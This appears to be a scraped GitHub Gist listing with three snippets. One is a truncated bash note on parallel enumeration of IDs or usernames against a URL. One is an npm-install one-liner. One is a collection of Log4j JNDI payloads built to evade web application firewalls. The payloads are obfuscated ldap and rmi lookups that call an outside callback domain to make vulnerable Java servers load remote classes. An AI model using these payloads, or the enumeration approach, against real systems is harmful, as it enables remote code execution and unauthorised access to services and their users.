Skip to content

Instantly share code, notes, and snippets.

@apolloclark
apolloclark / enumerate_url.md
Last active April 1, 2017 19:51
Enumerate (id, username, etc.) against a URL, using parallel to parallelize it

Make sure you are running an HTTP proxy on 127.0.0.1:8080 I suggest Burpsuite, Free Edition: https://portswigger.net/burp/download.html

I wrote this in Bash, not because it was easy, but because it was fast. This script lets you max out your CPU and network resources far better than Burpsuite, or a stand-alone python script, by taking advantage of the parallel program, and the many decades of C code optimization that's gone into Bash and GnuUtils.

[enumerate_url.sh]

#!/bin/bash

curlJsonEnum(){
@julienroubieu
julienroubieu / npm-install-all.sh
Created November 1, 2017 16:32
Run npm install in all subdirectories
find . -maxdepth 1 -type d \( ! -name . \) -exec bash -c "cd '{}' && npm install" \;
@ZephrFish
ZephrFish / Log4j Payloads
Last active December 20, 2022 19:32
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}